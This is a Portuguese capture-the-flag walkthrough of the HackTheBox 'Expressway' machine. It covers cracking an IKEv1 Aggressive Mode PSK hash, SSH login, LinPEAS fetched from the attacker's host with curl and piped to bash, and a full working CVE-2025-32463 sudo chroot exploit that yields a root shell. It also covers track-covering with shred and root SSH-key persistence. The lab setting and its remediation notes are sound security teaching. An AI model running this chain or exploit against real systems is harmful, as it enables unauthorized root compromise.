Expressway

https://app.hackthebox.com/machines/Expressway

Summary

Máquina Linux de dificuldade média do HackTheBox que apresenta um servidor VPN IPsec/IKE. A exploração começou com a identificação do serviço IKE na porta UDP 500, onde o IKEv1 em modo Aggressive Mode expôs um hash da Pre-Shared Key (PSK). O hash foi capturado e crackeado offline utilizando dicionário rockyou.txt, revelando a credencial ike:freakingrockstarontheroad. Com acesso SSH ao servidor, a enumeração do sistema revelou uma versão vulnerável do sudo (1.9.17). A exploração do CVE-2025-32463 através de um módulo NSS malicioso num ambiente chroot permitiu escalar privilégios para root.

MITRE Kill Chain

1

Reconnaissance

A varredura de portas identificou os serviços SSH (22/TCP) e IPsec/IKE (500/UDP).

2

Initial Access

O IKEv1 Aggressive Mode expôs o hash da PSK. Após crackeamento, a credencial ike:freakingrockstarontheroad foi obtida.

3

Credential Access

A credencial obtida foi utilizada para acesso SSH bem-sucedido como utilizador ike.

4

Privilege Escalation

A versão 1.9.17 do sudo foi identificada como vulnerável ao CVE-2025-32463. A exploração através de um módulo NSS malicioso no chroot concedeu acesso root.

5

Persistence

Uma chave SSH foi adicionada ao authorized_keys do root para acesso persistente.

---

Pre Engagement

Antes de iniciar o reconhecimento, foi organizado o workspace para manter o controlo das informações recolhidas durante o teste.

Environment Variables

Um ficheiro .env foi criado com variáveis de ambiente para utilização repetitiva durante a avaliação:

#!/bin/bash
# --- Target Information ---
export TARGET_IP="10.10.11.87"
export TARGET_NAME="Expressway"

# --- Users Credential ---
export USER1=""
export PASS1=""

Ao fazer source deste ficheiro, as variáveis ficam disponíveis para reutilização:

source .env

echo $TARGET_IP
10.10.11.87

Workspace Directories

Foram criados diretórios para organizar os dados de cada etapa, utilizando as fases MITRE ATT&CK como referência:

mkdir {recon,weapon,execution,foothold,persistence,privesc,evasion,creds,discovery,c2,exfil}

tree -a -L 1
.
├── c2
├── creds
├── discovery
├── .env
├── evasion
├── execution
├── exfil
├── foothold
├── persistence
├── privesc
├── recon
└── weapon

---

Reconnaissance

#attack/T1595 #attack/T1046

Host Discovery

A primeira ação para reconhecimento do alvo é testar a conectividade com ele, utilizando o comando ping. Ao enviar um pacote ICMP, é possível confirmar que a máquina alvo está acessível na rede.

No retorno, o TTL de 63 é uma indicação de que possivelmente estamos lidando com um sistema Linux. O TTL inicial para sistemas Linux geralmente é 64, e o valor observado no ping é reduzido conforme os pacotes atravessam roteadores na rede. Como o TTL está próximo de 64, é provável que o sistema alvo seja uma máquina Linux.

ping -c 1 $TARGET_IP
PING 10.10.11.87 (10.10.11.87) 56(84) bytes of data.
64 bytes from 10.10.11.87: icmp_seq=1 ttl=63 time=49.2 ms

--- 10.10.11.87 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 49.172/49.172/49.172/0.000 ms

Network Recon

#attack/T1046

Em seguida, uma varredura de portas foi executada no alvo. Primeiro, a ferramenta naabu da Project Discovery foi utilizada para uma rápida identificação de portas TCP:

echo $TARGET_IP | naabu -port 1-65535 -rate 3000 -c 50 -Pn -o $TARGET_IP-naabu-tcp-postscan.txt

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/

		projectdiscovery.io

[INF] Current naabu version 2.3.7 (latest)
[WRN] UI Dashboard is disabled, Use -dashboard option to enable
10.10.11.87:22
[INF] Found 1 ports on host 10.10.11.87 (10.10.11.87)

A varredura revelou apenas a porta 22 (SSH) aberta.

Uma varredura de scripts e versão com nmap foi então executada para obter mais detalhes sobre este serviço:

nmap $TARGET_IP -sCV -p 22 -v -n -Pn -oA $TARGET_IP-nmap-service-scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Uma varredura UDP foi então executada para identificar serviços adicionais:

sudo nmap $TARGET_IP -sU --top-ports 25 --open -T4 -v -n -Pn -oN $TARGET_IP-nmap-udp-portscan.txt

PORT     STATE         SERVICE
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
139/udp  open|filtered netbios-ssn
500/udp  open          isakmp
1701/udp open|filtered L2TP
4500/udp open|filtered nat-t-ike

A porta 500/UDP revelou ser um serviço IPsec/IKE (ISAKMP).

sudo nmap $TARGET_IP -sU -sCV -v -n -Pn -p 500 -oX $TARGET_IP-nmap-udp-service-scan

PORT    STATE SERVICE VERSION
500/udp open  isakmp?

---

Initial Access

#attack/T1133 #attack/T1110

IKE Enumeration

O serviço IKE foi enumerado utilizando a ferramenta ike-scan para identificar a configuração do gateway VPN.

IKE Main Mode

sudo ike-scan $TARGET_IP -M --showbackoff | tee $TARGET_IP-ike-scan.txt
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Main Mode Handshake returned
	HDR=(CKY-R=b11e1ba09d67951e)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)

IKE Backoff Patterns:

IP Address	No.	Recv time		Delta Time
10.10.11.87	1	1766627030.136960	0.000000
10.10.11.87	Implementation guess: Linksys Etherfast

Ending ike-scan 1.9.5: 1 hosts scanned in 60.168 seconds (0.02 hosts/sec).  1 returned handshake; 0 returned notify

IKEv2 Attempt

sudo ike-scan $TARGET_IP -M --ikev2 | tee -a $TARGET_IP-ike-scan.txt
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Notify message 14 (NO_PROPOSAL_CHOSEN)
	HDR=(CKY-R=191aed9b6437bdc7, IKEv2)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.113 seconds (8.89 hosts/sec).  0 returned handshake; 1 returned notify

• O resultado do Main Mode mostra um Main Mode handshake returned válido e uma proposta SA: Enc=3DES Hash=SHA1 Group=2 Auth=PSK. Isto significa que o gateway aceita pelo menos um transform e está configurado para usar Pre-Shared Key para Phase-1.

• Os VIDs incluem uma entrada XAUTH e um VID de Dead Peer Detection — XAuth significa que pode ser necessária autenticação estendida após a PSK de grupo.

• A tentativa IKEv2 retornou Notify 14 NO_PROPOSAL_CHOSEN — significa que as propostas não corresponderam aos transforms permitidos pelo gateway.

IKEv1 Aggressive Mode

O scan em modo Aggressive Mode foi executado para capturar o hash da PSK:

sudo ike-scan $TARGET_IP -M -A | tee -a $TARGET_IP-ike-scan-aggressive.txt
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Aggressive Mode Handshake returned
	HDR=(CKY-R=f0565df026830a17)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	KeyExchange(128 bytes)
	Nonce(32 bytes)
	ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
	Hash(20 bytes)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.060 seconds (16.77 hosts/sec).  1 returned handshake; 0 returned notify

• Em Main Mode, a troca de ID é encriptada, enquanto em Aggressive Mode, o ID e um hash da PSK são enviados em texto claro, permitindo o ataque de força bruta offline.

O ID ike@expressway.htb foi identificado, revelando o domínio do alvo. O domínio foi adicionado ao ficheiro .env e ao /etc/hosts:

grep "DOMAIN" .env
export TARGET_DOMAIN="expressway.htb"
export ADD_HOSTS='echo -e "$TARGET_IP\t$TARGET_DOMAIN" | sudo tee -a /etc/hosts'

source .env

bash -c "$ADD_HOSTS"
10.10.11.87	expressway.htb

Agora podemos usar o domínio para comunicar com o alvo:

ping -c 1 $TARGET_DOMAIN
PING expressway.htb (10.10.11.87) 56(84) bytes of data.
64 bytes from expressway.htb: icmp_seq=1 ttl=63 time=46.7 ms

--- expressway.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 46.664/46.664/46.664/0.000 ms

Hash Cracking

#attack/T1110_002

PSK Hash Capture

O hash da PSK foi capturado utilizando o ID correto:

sudo ike-scan $TARGET_IP -M -A --id=ike@expressway.htb -P | tee $TARGET_IP-ike-scan-brute.txt
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.11.87	Aggressive Mode Handshake returned
	HDR=(CKY-R=a712f8420e9436c7)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
	KeyExchange(128 bytes)
	Nonce(32 bytes)
	ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
	VID=09002689dfd6b712 (XAUTH)
	VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
	Hash(20 bytes)

IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
227f7641fcc54da256b848c3dbf1fc1fe247d0bfc0c52552723f474a4fd8f78433b6f9217a2591bd98d4c0a5d9afdb2297da253846a24bdaf85017a37a55fe049b0ea3d3a21a15be2f5229494e2c20297eac883535eb5db6d661230ffa8057ef5a22122e8d18b70a634ece53557f6261a2cf19b8e87312009e8de7f0208e0d08:42fbf1be96145744eea9232d6a6f83b2705e95b77e49de9007d3a612a466c1c00395428ce57038618bb20eb2909ed6d761dc3e2743e9398b9e7e90f370b8829bef04e903993048e5f654c981e53b5c011f62aefb7e26ea1759e77413235e4e49b5f4799e178ec23ee095fb19afcf579e6579493b3879438ce8fa88dcd1160365:a712f8420e9436c7:ef8453a28642f4bf:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:c216d284f4f9dc1cad6073001a442f5ecbfa0e86:4a0e2b12b0d97a7bc833d3ccbeceaa31253a8a30bf73742871369bbfcebe015a:c1bf3664884e33aab815ef7c24650cba0b194f06
Ending ike-scan 1.9.5: 1 hosts scanned in 0.063 seconds (15.93 hosts/sec).  1 returned handshake; 0 returned notify

O hash foi extraído para um ficheiro:

grep -oP '227?.*f06' $TARGET_IP-ike-scan-brute.txt | tee hash.txt
227f7641fcc54da256b848c3dbf1fc1fe247d0bfc0c52552723f474a4fd8f78433b6f9217a2591bd98d4c0a5d9afdb2297da253846a24bdaf85017a37a55fe049b0ea3d3a21a15be2f5229494e2c20297eac883535eb5db6d661230ffa8057ef5a22122e8d18b70a634ece53557f6261a2cf19b8e87312009e8de7f0208e0d08:42fbf1be96145744eea9232d6a6f83b2705e95b77e49de9007d3a612a466c1c00395428ce57038618bb20eb2909ed6d761dc3e2743e9398b9e7e90f370b8829bef04e903993048e5f654c981e53b5c011f62aefb7e26ea1759e77413235e4e49b5f4799e178ec23ee095fb19afcf579e6579493b3879438ce8fa88dcd1160365:a712f8420e9436c7:ef8453a28642f4bf:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:c216d284f4f9dc1cad6073001a442f5ecbfa0e86:4a0e2b12b0d97a7bc833d3ccbeceaa31253a8a30bf73742871369bbfcebe015a:c1bf3664884e33aab815ef7c24650cba0b194f06

PSK Cracking

O IKEv1 Aggressive Mode envia o hash da PSK antes da encriptação ser estabelecida, sendo vulnerável a ataques offline.

O hash foi crackeado utilizando o dicionário rockyou.txt:

psk-crack -d /opt/tools/rockyou.txt -v hash.txt
Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Loaded 1 PSK entries from hash.txt
Running in dictionary cracking mode
key "freakingrockstarontheroad" matches SHA1 hash c1bf3664884e33aab815ef7c24650cba0b194f06
Ending psk-crack: 8045039 iterations in 11.089 seconds (725513.67 iterations/sec)

Finding: IKEv1 Aggressive Mode with PSK

• Affected Asset: 10.10.11.87:500/UDP (IPsec/IKE VPN)

• Severity: High

• Vulnerability Type: Credential Disclosure

O IKEv1 Aggressive Mode expõe o hash da Pre-Shared Key durante o handshake inicial, permitindo ataque de força bruta offline.

Reproduction Steps:

1

Executar ike-scan com modo Aggressive Mode: sudo ike-scan -M -A <TARGET_IP>

2

Identificar o hash da PSK no campo Hash(20 bytes) da resposta

3

Extrair o hash para um ficheiro e crackear com dicionário: psk-crack -d rockyou.txt hash.txt

Remediation: Desativar IKEv1 e migrar para IKEv2. Se IKEv1 for necessário, utilizar PSK com pelo menos 64 caracteres aleatórios.

Credenciais Descobertas

• Usuário: ike

• Senha: freakingrockstarontheroad

• Fonte: PSK hash cracking (IKEv1 Aggressive Mode)

SSH Access

#attack/T1078

A credencial obtida foi utilizada para acesso SSH:

ssh ike@$TARGET_IP
ike@10.10.11.87's password: 

whoami; hostname -I; grep -iE 'id|name|version' /etc/*release
ike
10.10.11.87 dead:beef::250:56ff:fe94:5d74 
PRETTY_NAME="Debian GNU/Linux forky/sid"
NAME="Debian GNU/Linux"
VERSION_CODENAME=forky
ID=debian

O ficheiro .env foi atualizado:

grep 'USER' -A1 .env
export USER1="ike"
export PASS1="freakingrockstarontheroad"

Flag de utilizador capturada: 3867051b53fc6e9a45676abd82e810ec

---

Privilege Escalation

#attack/T1068

Com acesso inicial obtido, a análise focou-se na identificação de caminhos para escalação de privilégios.

Linux Enumeration

#attack/T1588_002 #attack/T1082

A ferramenta LinPEAS foi utilizada para realizar uma enumeração completa do sistema Linux.

1

Download da ferramenta na máquina atacante

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

linpeas.sh                            100%[======================================================================>] 952,58K  5,77MB/s    in 0,2s    

2

Alteração do nome para um UUID aleatório e codificação em base64

base64 -w0 linpeas.sh > 398a6654-997b-47e9-b12b-9515b896b4de

3

Servidor HTTP iniciado para tornar o ficheiro acessível ao alvo

uv run python3 -m http.server 8443
Serving HTTP on 0.0.0.0 port 8443 (http://0.0.0.0:8443/) ...

4

No alvo, o linpeas foi obtido e executado

curl -s -X GET http://10.10.15.129:8443/398a6654-997b-47e9-b12b-9515b896b4de | base64 -d | bash | tee /tmp/.398a6654-997b-47e9-b12b-9515b896b4de



                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |
    |---------------------------------------------------------------------------------|
    |         Learn Cloud Hacking       :     https://training.hacktricks.xyz         |
    |         Follow on Twitter         :     @hacktricks_live                        |
    |         Respect on HTB            :     SirBroccoli                             |
    |---------------------------------------------------------------------------------|
    |                                 Thank you!                                      |
    \---------------------------------------------------------------------------------/
          LinPEAS-ng by carlospolop

ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.

Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html
 <SNIP>

5

Análise dos resultados

A análise dos resultados revelou os seguintes pontos de interesse:

╔══════════╣ Sudo version
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
Sudo version 1.9.17

╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-3156] sudo Baron Samedit
[+] [CVE-2021-3156] sudo Baron Samedit 2
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

╔══════════╣ Active Ports
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-ports
══╣ Active Ports (netstat)
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      
tcp6       0      0 ::1:25                  :::*                    LISTEN      
tcp6       0      0 :::22                   :::*                    

╔══════════╣ Users with console
ike:x:1001:1001:ike,,,:/home/ike:/bin/bash
root:x:0:0:root:/root:/bin/bash

╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/gcc
/usr/bin/make
/usr/bin/python3
/usr/local/bin/sudo
/usr/bin/wget

╔══════════╣ Analyzing SSH Files (limit 70)

-rw------- 1ike ike 3434 Aug  6 03:13 /home/ike/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
<SNIP>

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 1.5M Aug 14 12:58 /usr/sbin/exim4
-rwsr-xr-x 1 root root 1023K Aug 29 15:18 /usr/local/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 116K Aug 26 22:05 /usr/bin/passwd
-rwsr-xr-x 1 root root 91K Sep  9 10:09 /usr/bin/su
-rwsr-xr-x 1 root root 276K Jun 27  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable

O ficheiro linpeas foi apagado utilizando shred para cobrir rastros:

shred -zun 5 -v .398a6654-997b-47e9-b12b-9515b896b4de
shred: .398a6654-997b-47e9-b12b-9515b896b4de: pass 1/6 (random)...
shred: .398a6654-997b-47e9-b12b-9515b896b4de: pass 2/6 (ffffff)...
shred: .398a6654-997b-47e9-b12b-9515b896b4de: pass 3/6 (random)...
shred: .398a6654-997b-47e9-b12b-9515b896b4de: pass 4/6 (000000)...
<SNIP>
shred: .398a6654-997b-47e9-b12b-9515b896b4de: removed

CVE-2025-32463 Analysis

#attack/T1548_003

A enumeração revelou um binário sudo num diretório local com uma versão vulnerável:

/usr/local/bin/sudo --version
Sudo version 1.9.17
Sudoers policy plugin version 1.9.17
Sudoers file grammar version 50
Sudoers I/O plugin version 1.9.17
Sudoers audit plugin version 1.9.17

A pesquisa de vulnerabilidades relacionadas com esta versão do sudo identificou o CVE-2025-32463:

• https://nvd.nist.gov/vuln/detail/cve-2025-32463

Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.

A ferramenta vulnx da Project Discovery foi utilizada para obter detalhes adicionais:

~/go/bin/vulnx id CVE-2025-32463
 __   __      _       __  __
 \ \ / /_  _ | | _ _  \ \/ /
  \ V /| || || || ' \  >  <
   \_/  \_,_||_||_||_|/_/\_\

    the swiss army knife for vulnerability intelligence

[INF] Current vulnx version v1.0.0 (latest)
[CVE-2025-32463] Critical - Sudo - Privilege Escalation
  ↳ Priority: IMMEDIATE | EXPLOITS AVAILABLE | Vuln Age: 178d
  ↳ CVSS: 9.3 | EPSS: 0.1849 | KEV: ✔ (CISA, VULNCHECK)
  ↳ Patch: ✘ | POCs: 100 | Template: ✘ | HackerOne: ✘

Summary 📝
  ↳ Sudo < 1.9.17p1 contains a privilege escalation caused by using /etc/nsswitch.conf from a user-controlled directory with the --chroot option, letting local users obtain root access, exploit requires local user privileges.

Risk ⚠️
  ↳ Local users can gain root access, leading to full system compromise.

Remediation 🔧
  ↳ Update to version 1.9.17p1 or later.

POCs 🔍
  → https://www.secpod.com/blog/sudo-lpe-vulnerabilities-resolved-what-you-need-to-know-about-cve-2025-32462-and-cve-2025-32463/
  → https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
  → https://github.com/justjoeyking/CVE-2025-32463

CVE-2025-32463 Exploitation

#attack/T1068

Um PoC público do CVE-2025-32463 foi identificado no GitHub:

• https://raw.githubusercontent.com/kh4sh3i/CVE-2025-32463/refs/heads/main/exploit.sh

O exploit foi transferido para o diretório /tmp do alvo:

cat .1b671a64-40d5-491e-99b0-da01ff1f3341
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

O exploit foi tornado executável:

chmod +x .1b671a64-40d5-491e-99b0-da01ff1f3341

O comando id confirmou o utilizador atual:

id
uid=1001(ike) gid=1001(ike) groups=1001(ike),13(proxy)

O exploit foi executado, resultando em acesso root:

./.1b671a64-40d5-491e-99b0-da01ff1f3341
woot!
root@expressway:/# id
uid=0(root) gid=0(root) groups=0(root),13(proxy),1001(ike)

Finding: Sudo Local Privilege Escalation (CVE-2025-32463)

• Affected Asset: 10.10.11.87 (sudo 1.9.17)

• Severity: Critical

• Vulnerability Type: Local Privilege Escalation

• CVE: CVE-2025-32463

O sudo versões anteriores a 1.9.17p1 permite a utilizadores locais obter acesso root porque o /etc/nsswitch.conf de um diretório controlado pelo utilizador é usado com a opção --chroot.

Reproduction Steps:

1

Verificar versão do sudo: sudo --version

2

Obter e compilar o exploit PoC (criar biblioteca NSS maliciosa)

3

Executar: sudo -R <dir_customizado> <comando>

Remediation: Atualizar sudo para versão 1.9.17p1 ou posterior.

Com acesso root, foi possível aceder ao ficheiro shadow e às flags do CTF:

root@expressway:/# head -n1 /etc/shadow
root:$y$j9T$u0cgimzO/m87OQdCkETl10$mTZSmVXBn10OJT7qVqvlEr7OwC0QppltyX33WH1esn7:20229:0:99999:7:::
root@expressway:/# cat /home/ike/user.txt /root/root.txt 
3867051b53fc6e9a45676abd82e810ec
3303f3b5c64cd0d8d813ace57d2b03ec

O ficheiro do exploit foi apagado:

root@expressway:/# shred -zun 5 -v . /tmp/.1b671a64-40d5-491e-99b0-da01ff1f3341 
shred: .: failed to open for writing: Is a directory
shred: /tmp/.1b671a64-40d5-491e-99b0-da01ff1f3341: pass 1/6 (random)...
shred: /tmp/.1b671a64-40d5-491e-99b0-da01ff1f3341: pass 2/6 (ffffff)...
shred: /tmp/.1b671a64-40d5-491e-99b0-da01ff1f3341: pass 3/6 (random)...
<SNIP>
shred: /tmp/.1b671a64-40d5-491e-99b0-da01ff1f3341: removed

Escalação de privilégios bem-sucedida. Comprometimento total do sistema alcançado.

---

Persistence

#attack/T1098

Para manter acesso persistente ao alvo, uma chave SSH foi adicionada ao authorized_keys do root.

1

Criação de chave SSH na máquina atacante

ssh-keygen -f key
Generating public/private ed25519 key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in key
Your public key has been saved in key.pub
The key fingerprint is:
SHA256:bRo8FTpkXyC7/pdYUIcImHmJzzpUl0kpu0+LbaI6OnE ubuntu@DESKTOP-HAGISP5
The key's randomart image is:
+--[ED25519 256]--+
|       ==++*..   |
|      =o==*oo .  |
|       =++o. .   |
|      ..+=.      |
|     . .S.o.     |
|  . E o..=. .    |
|   o   .o= + .   |
|  . .   o.* o    |
|  .o.o.. o..     |
+----[SHA256]-----+

2

Obtenção da chave pública

cat key.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFK93jR9D2z6F+XX7cMEFMPwNlHkpvAQua0x/pweOzUR ubuntu@DESKTOP-HAGISP5

3

Adição da chave pública ao authorized_keys do root

root@expressway:/# echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFK93jR9D2z6F+XX7cMEFMPwNlHkpvAQua0x/pweOzUR ubuntu@DESKTOP-HAGISP5' >> /root/.ssh/authorized_keys 

4

Acesso SSH persistente

ssh root@$TARGET_IP -i key

hostname -I
10.10.11.87 dead:beef::250:56ff:fe94:5d74